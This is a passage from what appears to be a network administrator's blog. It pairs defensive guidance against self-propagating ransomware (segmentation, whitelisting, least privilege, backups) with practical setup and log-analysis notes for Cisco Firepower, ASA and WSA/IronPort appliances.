  • Ensure that guests are signed in at reception, signed out, and always shadowed. Guests should have an escort with them at all times.
  • Tailgating, or the practice of unauthorized individuals following authorized individuals into a restricted area, and can be a big problem. Most people have a tendency to avoid confrontation, so this makes enforcing tailgating policies a little more difficult, especially when challenging individuals who appear to "have their hands full". This can be mitigated by writing into security policy a requirement that employee badges must be present and visible at all times. Additionally, all authorized guests, vendors, etc. should be required to adhere to this policy, and badge in to all gates and be escorted/shadowed by an employee at all times.

Impeding Lateral Movement and Propagation


If attackers make it through your initial defenses, your goal is to make it is hard as you can for them to move laterally inside your network. Through careful architecture and password management you can make lateral movement much more difficult.
  • Network segmentation is a massive part of impending lateral movement and containing threats easily. The majority of corporate networks are "flat" with little to no segmentation between business units, between users and data, between data specific to business units, etc. The reason you don't typically see network segmentation in large organizations is that it requires coordination and planning on a massive scale. Most networks grow as the need for capacity arises, with little to no thought on segmentation. Business acquisitions are usually focused on how to integrate additional assets quickly as opposed to securely. All of that aside however, the benefits of properly segmented networks cannot be denied. Segmentation can be used to stop and/or slow lateral movement, as well as contain threats. There are multiple components for segmented networks, and this should NOT be considered an exhaustive list, but consider implementing the following:
    • VLAN and subnet segmentation: Each business unit should have its own VLANs and subnets for logically separating access to data. Segmentation should NOT stop at the business unit, however. User workstations need to be segmented from the servers/services required for that business unit, as well as services that are used across business units (e.g. messaging, file sharing, e-mail, etc.) This list of VLANs and subnets should be meticulously maintained and available for both IT and Security staff. If you do not have this information by default, or are looking to try and figure out how to logically separate users, servers and business units, consider looking for DHCP scope configurations and using them as a rule of thumb for subnet and VLAN segmentation.
    • Dedicated firewall/gateway segmentation: firewalls are another important part of network segmentation and an often overlooked portion of internal network design. Understand which business units have a requirement to communicate directly with one another, and which ones do not. Understand which services and ports are required for that inter-business unit communication. Do ingress as well as egress filtering (doing this requires understanding the direction in which data flows for services). Firewall policy should be reviewed regularly. IT and Security staff should have access to the firewall policies and should be included in policy review decisions.
    • Host-based firewalls with ingress/egress filtering configured. Again, ingress and egress. Hosts should not be able to communicate via SMB (139/tcp, 445/tcp) between one another. If file server(s) are set up, then there should effectively be no need for this. If you can effectively disable host-to-host SMB communication, you prevent the attackers from being able to utilize the "pass the hash" for lateral movement. SMB communication should be limited to application distribution platforms, file shares, and/or Domain Controllers.
  • Application Blocking/Whitelisting: Application whitelisting is a built-in feature for windows that can be implemented via software restriction policies[43]. However, not unlike network segmentation it takes a significant amount of time to implement and test, especially if different business units have different application needs. As a stopgap measure, it may be easier to try and block executables that attempt to run from specific locations, such as %TEMP% or %APPDATA% directories on windows systems, making exceptions for certain applications only as necessary[44]. Not unlike network segmentation, whitelisting is a significant time investment, but it is a tremendous boon for containing and preventing initial access AND lateral movement.
  • Role-Based network share permissions (Least Privilege): File shares tend to get incredibly complex between multiple business units, folder permissions and share permissions for the network. Application of least privilege for file shares prevents the compromise of a single user resulting in the loss of most of the data on the network file share in the event of ransomware, as well as preventing compromised accounts being used to access data from different business units; If password security is poor, a compromised user account may be used by attackers to gather credentials stored on file shares with access the user should not have.
  • Proper credential management: Users should be trained to utilize a password manager along with strong passwords for storing network credentials. Train users to NOT re-use

Recovery


Backup recovery is your last line of defense to having to pay out a ransom to the attackers; it's your last bastion in the event that the worst has happened. Your ability to recover from this attack with minimal data loss and/or service interruption amounts to whether or not the system backups and/or disaster recovery sites were compromised as a part of the attacker methodology. Whether or not your backups were compromised depends on how well your backup systems and/or network and/or recovery sites were sufficiently segmented from your main network. Even in the event your organization does not utilize on-site backups at all, instead opting for cloud backup solutions (e.g. Amazon Glacier), if those cloud backup credentials are left in easily accessible locations, or if passwords are reused, our hypothetical adversary could easily delete all backup instances, resulting in 100% data loss if there is no other backup solution in place. The secure, off-site, enterprise backup solution could easily be defeated through password reuse and/or poor password management.

For enterprises utilizing backup solutions, there are a wide variety of backup methodologies; the SANS reading room has a comprehensive document on tape rotation schemes that is incredibly helpful for reviewing different tape backup schemes[45]. Typically as a part of a tape rotation policy, a portion of those tapes are delivered to an off-site storage facility. This is for disaster recovery purposes; if there a catastrophic failure at the site hosting an organization's data, the tapes at the storage facility are still there to recover from at a backup facility. In a scenario in which local backups are deleted, removed, or otherwise made inaccessible by the attackers, off-site backups are often your only hope of restoring service without paying the ransom. Depending on how often your backups are sent off-site determines how much data (if any) would be inaccessible or lost.

Conclusion


The past few years have seen a dramatic uptick in ransomware variants and their deployment on a global scale due. Cyber criminals see an easy opportunity for profit. It is inevitable that these adversaries would look to the past for effective malware behaviors to advance the efficacy of ransomware. Combined with new methodologies in targeting, we anticipate a trend towards ransomware that can self propagate and move semi-autonomously throughout a network to devastating effect.

To emphasize this, one need look no further than SamSam.exe, the malware sample recovered from a number of scattered enterprise network breaches mainly targeting the healthcare vertical. SamSam isn't complex, and it not fully self-sufficient, but it does exhibit some of the behaviors of a successful worm - rapid propagation, payload delivery (ransomware), and crippling recovery efforts. The age of self-propagating ransomware, or "cryptoworms", is right around the corner.

For too long, critical security controls and best practice for enterprise network security has been publicly praised and privately ignored. Drop-in appliances and security solutions can only do so much to protect the network, and will do little to stop this threat if networks continue to be architected and expanded without defense in depth in mind. If enterprises don't start making strides towards defensible architecture today, massive ransoms may end up getting paid tomorrow.

Monday, 18 April 2016

Cisco Firepower Notes


Base policy IPS policies lets you avoid tuning IPS
Security over connectivity

Before = Access policies
During = IPS inspection
After = IOC/correlation

Create Banned applications rule

Allow file sharing
Inspection tap
Sec over connectivity
Malware policy ELH Files Policy


ISE attributes
Can be used to block iPads iPhones etc access to critical hosts

Upgrading the RAM in a Cisco ASA

1 - Backup config
2 - Take picture of cables
3 - Label cables
4 - power off ASA and un-cable
5 - Unscrew and open case
6 - Install the new DIMM
7 - re-cable and power on
8 - confirm upgrade with sh ver | i RAM

Wednesday, 23 March 2016

Device SW Versions lower than '5.4.0' currenly are not supported for DC at '6.0.1' cisco firepower

When attempting to register a sensor with the management VM got this error

Device SW Versions lower than '5.4.0' currenly are not supported for DC at '6.0.1'

Need to upgrade the software on the sensor

Wednesday, 17 February 2016

Cisco WSA ironport

Why use it

HTTP/HTTPS proxy
FTP proxy
Caching engine (delivers pages faster)
URL filtering with built in categories and dynamic filtering (block facebook etc)
Antimalware
Uses web reputation to block malware
Signature based malware engines
L4 traffic monitoring sort of like IPS
You want all traffic to go through the WSA
Use FW to restrict only the WSA to have access to the internet.
Span port on internet facing port if there is any web traffic not sourced from the WSA it can do a TCP reset
Web security is layer 7
The web is not a safe place so the WSA can help protect you.
Be aware some of the features overlap with the ASA so don't pay for same thing twice.

Unit types

S170 (physical unit, lowest end unit)
1 rack unit
1 dual core 2.8 Ghz
4GB mem
500GB HD (2x250GB sata RAID 1)
Hot swapable HDs
5 Ethernet ports and a console port

S000V (the virtual appliance)
S100V (more powerful etc)
S300V

Ports
M1 can be dedicated for managemetn and proxy
P1 and P2 can only be used for proxy
T1 and T2 are for L4TM similar to IPS

Licensing

You must have a physical unit licensed first then you can download the virtual appliance
Take the serial for the device and apply for software bundle license for free
loadlicense xml file. You need to ftp the xml file onto the device. You can also paste into CLI.

Alternatively apply for 45 day demo license
Demo licenses can be aquired through the cisco licensing page:
https://tools.cisco.com/SWIFT/LicensingUI/demoPage
Choose demo or evaluation licenses

Ironport was acquired by Cisco there is still some Ironport tech and terminology
Licenses give you access to "blades" or modules with features in them
Most licenses will last for 1 year when activated.

You can split your license between two virtual boxes to be used in HA. 500 seat license becomes two 250 seat licenses. You'll need to get the serials and log a call with Cisco even they seem to be confused about it. I had to send, serial and mac addresses to them. They ask for VLN which can be found in show license but if the license is expired or its a fresh install you won't have a VLN yet you need Cisco to resolve that.

You can fulfill the PAK on your primary machine and use the share function in our Licensing Registration Portal for your secondary virtual machine. You will get 2 license files each for your Virtual Machines.

I had to select physical machine. Added first VLN. Add device Added second VLN, then selected virtual and next and it sent me two files. Applied the files with loadlicense command.

If FTP is enabled you can use windows explorer to browse to ftp://x.x.x.x/configuration and drag and drop the lic file there. Then use loadlic from the CLI of the WSA. When reinstalling you can just apply the same lic file again.

Licenses may show as "Dormant" until you enable Web and/or https proxy.

AsyncOS

Based on FreeBDS
Optimized for low latency
Caching used for optimize disk IO
No shell access
No tuning of the OS
Need Cisco TAC to do password recovery

Web proxy
All connection can from the
Anti-virus
Url filter
Policy management
All in the same box

Some of the features overlap with the ASA

Layer4 traffic monitoring 

Scans outbound traffic at wire speed and can disrupt sessions
Active session and passive blocking

M1 management interface

How to get traffic
WCCP method (transparent proxy mode)
User -> Switch -> WSA -> internet
internet -> WSA -> switch -> User
The user doesn't know they have been proxied

Proxy server method
User -> WSA -> internet
internet -> WSA -> user
User uses a proxy server we can enforce proxy with group policy
Restrict access to install other applications like firefox etc

We can also use a pac file so when DHCP gets an address it pull in the pac file and gets the proxy settings can be hard to get to work with all browsers etc.

Admin interfaces

http://wsa-m1:8080
https://wsa-m1:8443
You can change these

default username/password
admin/ironport

CLI
SSH TCP 22
History up and down arrow
Tab completion
? for list of commands
default IP address 192.168.42.42

CLI Commands

version - version and license information 
authcache <- see list of authenticated users (can flush them)
grep > 1 (accesslog) > DENIED or domain.com or DOMAIN\\username
nslookup
ping
telnet
interfaceconfig (setup IP addresses on interfaces)
setgateway (set default gw)
sethostname (set the hostname)
etherconfig (quick way to see the MAC addresses)
etherconfig ( you can use to setup sub interfaces / trunk interface, can only be done in CLI)
etherconfig > VLAN > NEW > 100 > P1 -> commit
Restart proxy services - diagnostic -> proxy -> kick (users will lose connection for 5 secs)
shutdown - shutdown the ironport if you need to make a change in vmware
commit (after making changes always do commit to save)
status detail - see CPU and RAM usage

Searching the logs
Top Auth failed sources (bypass if needed)
grep -i 'No such user' authlog.current | awk '{s[$15]++;} END { for(i in s) print s[i], i }' | sort -n -k 1 | tail -n 30 | sort -n -r

grep -i 'No such user' authlog.@20180314T162255.s | awk '{s[$15]++;} END { for(i in s) print s[i], i }' | sort -n -k 1 | tail -n 30 | sort -n -r

Auth failed destination (bypass if needed)
grep 'TCP_DENIED\/407 ' aclog.current | awk '{print $7}' | awk -F / '{print $3}' | awk '{for(i=1;i<=NF;i++)a[$i]++}END{for(o in a) printf "%s %s\n",o,a[o]}' | sort -gr +1 | head -n12

grep '\/401 ' aclog.current | awk '{print $7}' | awk -F / '{print $3}' | awk '{for(i=1;i<=NF;i++)a[$i]++}END{for(o in a) printf "%s %s\n",o,a[o]}' | sort -gr +1 | head -n12

Check for hight numbers of codes in this case 503 DNS errors are high
cat aclog.current | awk '{print $4}' | awk '{for(i=1;i<=NF;i++)a[$i]++}END{for(o in a) printf "%s %s\n",o,a[o]}' | sort -gr +1 | head -n30

NONE/503 8910946  <<<
TCP_MISS/200 5994669
TCP_CLIENT_REFRESH_MISS/200 1911343
TCP_DENIED/407 1714271
TCP_MISS/401 234946
TCP_REFRESH_HIT/200 135614


Top failed DNS destinations (check DNS server and config local DNS entries)
grep 'NONE\/503 ' aclog.current | awk '{print $7}' | awk -F / '{print $3}' | awk '{for(i=1;i<=NF;i++)a[$i]++}END{for(o in a) printf "%s %s\n",o,a[o]}' | sort -gr +1 | head -n12


Initial config

default IP address https://192.168.42.42:8443
default u: admin p: ironport
Accept eula
Hostname.domain.local
DNS servers
NTP server
Set time region
Network context page
Do you have another appliance somewhere in the network
Put the WSA closest to the clients downstream of the other proxy
Just click next if you don't have another proxy

DNS names are important in the WSA so make sure
wsa.domain.com resolves.
You can make a host entry if needed
on the CLI dnsconfig -> localhosts (hidden command)

Interfaces
Tick box to use M1 for management only *** (Important)
Ticking that box gives you a different routes for the Management interface which is useful.
P1 = data interface
Default GW

You can also have
M1 (inside) management only
P1 INSIDE
P2 DMZ
Set default route for DMZ

Transparent settings
Layer 4 Switch or No Device

Set admin password
Set email alerts
Untick boxes for anonymous statistics

Security settings
Most settings defaults are fine security settings are enabled

Review page of all settings

The changes pending button appears in the top right
Changes you make need to be committed, this button appears after making changes

Activate licenses

Commit changes button

When you make changes in the web interface you'll see the commit changes button turn yellow in the top right. You need to click this to save your changes. In the CLI run the commit command.

Reports

You can get it to run a report on a schedule and email it to you
Remember you need to commit changes.
If you don't commit nothing will happen

Policy Trace

System administration -> Policy trace
You can put in a URL and a source IP (like a packet trace on ASA)
You have to fill in the username and IP or I've seen inconsistent results
Fill in url, auth, ip address, username
Lots of advanced values you can fill in
If a websites web reputation is good the wsa won't block it
It takes a little while to complete wait for final result

Deploying proxy services

We have two options for proxy deployment
Transparent mode
Explicit forward (clients are pointed at the proxy server IP)

Logging

There isn't much space built in for logging so we need to configure a syslog server
In the CLI type grep (you can choose to tail later with this command)
Logs are in the squid-cache format
TCP_MISS means it wasn't cached by the WSA
TCP_HIT means it came from the cache
List of TCP codes
http://www.tcpipguide.com/free/t_HTTPStatusCodeFormatStatusCodesandReasonPhrases-3.htm
Cisco also offers AWSR (advanced web security reporting tool) which is basically splunk. It has its own license. Syslog server will probably do the job.

Custom block page


Security Services > End-User Notification -> Edit settings
https://www.cisco.com/c/en/us/td/docs/security/wsa/wsa11-0/user_guide/b_WSA_UserGuide/b_WSA_UserGuide_chapter_010100.html

The PAC file

The pac file is just a javascript file. PAC stands for proxy autoconfig. We drop the pac file on a webserver somewhere. You can also host it on the WSA. Can be easier to just deploy proxy settings with group policy.

function FindProxyForURL (url,host) 
{
return "PROXY wsa.lab.local:80; DIRECT";
}

Sec services -> pac file hosting
remember port is 9001
Choose the file and upload
commit changes

In browser (you can use a GPO to push this out to the clients)
Autoconfig url
wsa.lab.local:9001/pac.txt

One method to ensure user must use the WSA is to only allow the WSA internet access on your firewall.

Management roles

Administrator - Full rights
Operator - Can make some changes but can't do some tasks like upgrades etc
Read only Operator - Can only read information
Read only Guest - Can only read system status 

Policies

We can create policies to create groups of user, sites etc and create access policies.
There is a global policy for everything with nothing blocked.
You can choose to block IM clients, youtube, p2p, social media etc
You may have to enable https inspection to fully block these applications.
Identities - Policies based on who you are. It identifies the user being proxy'd.
There are many policies you can combine them to get what you want.

Acceptable Use controls
Enable dynamic content analysis engine (blocks site that appear to be gambling etc but don't have a web reputation score yet)

Logging
You can ftp into the WSA
You can frp or scp the file off
You can configure a syslog server
Splunk is advised for managing the log files

You can create some simple categories ALLOWED and BLOCKED.
On their own they don't do anything you need to add these unto the access policy
You can configure a custom time range.
Don't forget to commit changes

We can have an identity for the users. So marketing users are allowed access to facebook but accounts users are not.

Network -> Authentication 
Add realm
Make sure your time matches on IP and DC's
Add NTLM if you are using active directory you could use LDAP either
Add the DC ip addresses
Enter IPs of domain controller 192.168.1.10 (incase DNS goes down)
Fill in your domain lab.local
When Joining the domain (creating the computer account) don't use DOMAIN\administrator just use administrator
Test realm settings.
Don't forget to commit changes

You can setup the WSA to require authentication. You can set exceptions for things like windows and adobe updates. You can even allow an exception for guest users that they get a different level of web access without authentication

authencache
list shows you authenticated users

Web proxy

Headers
x-forwarded-for 
If you have upstream proxies you may need to change this to send for authentication to work correctly
Can proxy FTP, HTTPS etc if you have the license

WSA http processing 

Rule processing order:
Check if the URL is in a custom category (allow/deny)
Check the rules for the built in URL categories
If it isn't matched by above, WSA check un-categorised URL rules
Web reputation score
Anti malware scanning
Application visibility and control (facebook allowed but apps denied)

Matching URLs
www.google.com = www.google.com exactly is matched
.google.com = all sub domains are matched.
You can use regular expressions too.

WSA HTTPS/SSL decryption

Sec Services -> HTTPS proxy
Enable HTTPS proxy
Create decryption policy
Explicit forward mode is better for http decryption as HTTP CONNECT messages are sent to the WSA
Default - pass through (do nothing)
decrypt - WSA acts as man in the middle
drop - drop the traffic
Monitor - watch whats going on but allow it

If the action is to decrypt we decrypt but then we sent it through the access policies too. You need a ROOT certificate.Subject Type=CA, No End Entity. Its not the same as normal SSL cert signing.


Security services -> HTTPS proxy
Takes some time to enable (wait 5 min)
Now click enable and edit settings, accept the EULA
Leave default port of 443
Use generage cert+key for self signed key
cn: lab.domain.com
org: myorg
ou: mylab
country: ie
duration: 36
click generate

Download the CSR and get signed by your CA then upload back or WSA
Or download cert from WSA and push out via group policy.

untick enable decryption for authentication 
Might need to enable decryption for enchanced AVC
Submit

We can change settings to control what WSA does if there is an issue with the cert on the destination server, we can drop allow etc

URL filter policy

After its setup run a policy trace on https://www.google.ie

Keep in mind some global settings can override your policies

Default action kicks in when the WSA couldn't decide on a final action. 

High availability

Can use a dedicated load balancer if you want
HA is available in Async OS 8.5.0
HA is available in both physical and virtual
Single master, multiple backups
Preemption (the master can take back over)
HA DOES NOT SYNC CONFIG, you need to do it manually

You cannot sync the config with HA but yes you can manually transfer the config to another WSA. P

Steps to copy config from the WSA:

Set up the master how you want with all settings etc
Go to WSA GUI > System Administration > Configuration File > Uncheck “Mass passphrases” by selecting “Plain passwords in the Configuration Files” > Now click submit and the config will be downloaded as a xml file.

Steps to upload config to another WSA:
Go to WSA GUI > System Administration > Configuration File > under Load configuration select “Load a configuration file from local computer” > Browse to the downloaded config and then click load.

Setting up the HA
On master
Make sure you are running at least 8.5
Network -> High availability
New failover group
Need a VIP (subnet mask must match interface it gets bound to)
Bind it to an interface
Master
Can enable a shared secret

On backup
Configured
Same failover group
same VIP
Set priority as backup
same shared secret if you set that

higher priority = will become master

Point clients at the VIP in their proxy settings.

on the master
failoverconfig - see failover settings
testfailovergroup (then -1)

Make sure to do the ESX/vswitch part

ESX config
https://www.cisco.com/c/en/us/support/docs/security/web-security-appliance/119188-technote-wsa-00.html  

Check
Net.ReversePathFwdCheckPromisc” is set to 1


Edit properties on the vswitch where hosts are.
Edit -> Security
Promiscuous mode = accept  

Bandwidth and time quota

Quotas can be applied for HTTP/HTTPS and FTP
Quotas are reset daily

Web security manager -> Time range and quotas
Add time range button
Add quota button
Give a make, set the time for quota to be reset (defualt midnight)
Volume quota set MB or Gig.

Tie to an access policy
Web security policy -> Access polices -> URL filtering
Pick a category and tick quota
Tick quota based, select your quota
Commit

Users will get a message that they are over quota when they go over.

Upgrades

Its best to upgrade from the VMware console as you will see all errors there.

More info

CCIE Security Advanced Technology Course v4